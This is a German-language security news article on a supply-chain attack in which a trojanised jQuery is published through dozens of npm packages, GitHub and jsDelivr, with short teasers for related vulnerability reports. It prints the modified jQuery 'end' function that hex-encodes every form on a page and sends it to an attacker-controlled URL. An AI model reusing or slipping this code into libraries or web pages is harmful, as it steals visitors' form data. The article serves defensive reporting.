NPM: Trojanisierte jQuery-Version entdeckt

Seit dem 26. Mai 2024 beobachtet die IT Security Firma Phylum eine anhaltende Supply-Chain-Attacke, bei der eine trojanisierte Version von jQuery über npm verbreitet wird. Diese bösartige Variante wurde in Dutzenden von Paketen veröffentlicht und findet sich auch auf Plattformen wie GitHub und als CDN-gehostete Ressource auf jsDelivr.

Diese Attacke zeichnet sich durch eine hohe Variabilität in den Paketen aus. Die veröffentlichten Pakete enthalten meist eine vollständige Kopie von jQuery, häufig unter dem Namen jquery.min.js oder anderen Variationen wie registration.min.js, icon.min.js und fontawesome.js. Die URLs zur Exfiltration von Daten waren für jedes Paket nahezu einzigartig, und die Angreifer verwendeten neue Benutzernamen für die Veröffentlichung auf npm. Manche Pakete enthielten auch persönliche Dateien wie den npm-Cache-Ordner, npm-Log-Dateien und eine termux.properties-Datei.

Die Angreifer haben die end-Funktion im jQuery-Prototyp modifiziert, um zusätzlichen bösartigen Code einzufügen:

end: async function () {
  await $.ajax({
    url: "https://anti-spam[.]truex[.]biz[.]id/halo/?cat=" + (function (e) {
      for (var t, n = 0, r = e.length, i = ""; n < r; ++n)
        i += (t = e.charCodeAt(n).toString(16)).length < 2 ? "0" + t : t;
      return i;
    })($("form").serialize()),
    type: "GET",
    dataType: "text",
    headers: { "Content-type": "application/json" },
  });
}

Diese modifizierte Funktion sendet alle Formulardaten auf der Seite an eine Remote-URL, sobald die end-Funktion aufgerufen wird. Obwohl die end-Funktion selbst selten direkt verwendet wird, ruft die fadeTo-Methode aus dem jQuery-Animations-Toolkit die end-Funktion auf, was diese Angriffsmethode besonders tückisch macht.

Die Untersuchung ergab auch, dass ein Benutzer namens indexsc auf GitHub mehrere Versionen der trojanisierten jQuery-Datei hostet. Diese Dateien wurden über verschiedene npm-Konten und unter Verwendung verschiedener Paketnamen veröffentlicht.

Entwickler sollten ihre Projekte auf die Nutzung der betroffenen jQuery-Versionen überprüfen und sicherstellen, dass sie auf eine sichere Version aktualisieren.

Related Posts

EU-Kommission verklagt EU-Datenschutzbeauftragten wegen Nutzung von MS365

Die EU-Kommission hat kürzlich den EU-Datenschutzbeauftragten verklagt, da die EU-Kommission weiterhin Microsoft-365 nutzen will. Die Entscheidung sorgt für erhebliche Diskussionen und könnte weitreichende Folgen für den Datenschutz in der EU haben.

Read More

OpenStack: Beliebiger Dateizugriff durch benutzerdefinierte QCOW2-Daten

Eine Sicherheitslücke (CVE-2024-32498) in der Verarbeitung von QCOW2-Images betrifft die OpenStack-Komponenten Cinder, Glance und Nova. Martin Kaesberger entdeckte, dass ein speziell erstelltes QCOW2-Image, das einen bestimmten Dateipfad referenziert, es einem authentifizierten Benutzer ermöglicht, auf die Inhalte dieser Datei zuzugreifen. Dies kann zu einem unbefugten Zugriff auf potenziell sensible Daten führen.

Read More

Race-Condition in OpenSSH ermöglicht Remote Code Execution

Eine kritische Sicherheitslücke wurde von Qualys in OpenSSHs Server (sshd) auf glibc-basierten Linux-Systemen entdeckt. Diese Schwachstelle, bekannt als CVE-2024-6387, ermöglicht unauthentifizierte Remote Code Execution (RCE) als root und stellt somit ein erhebliches Sicherheitsrisiko dar.

Read More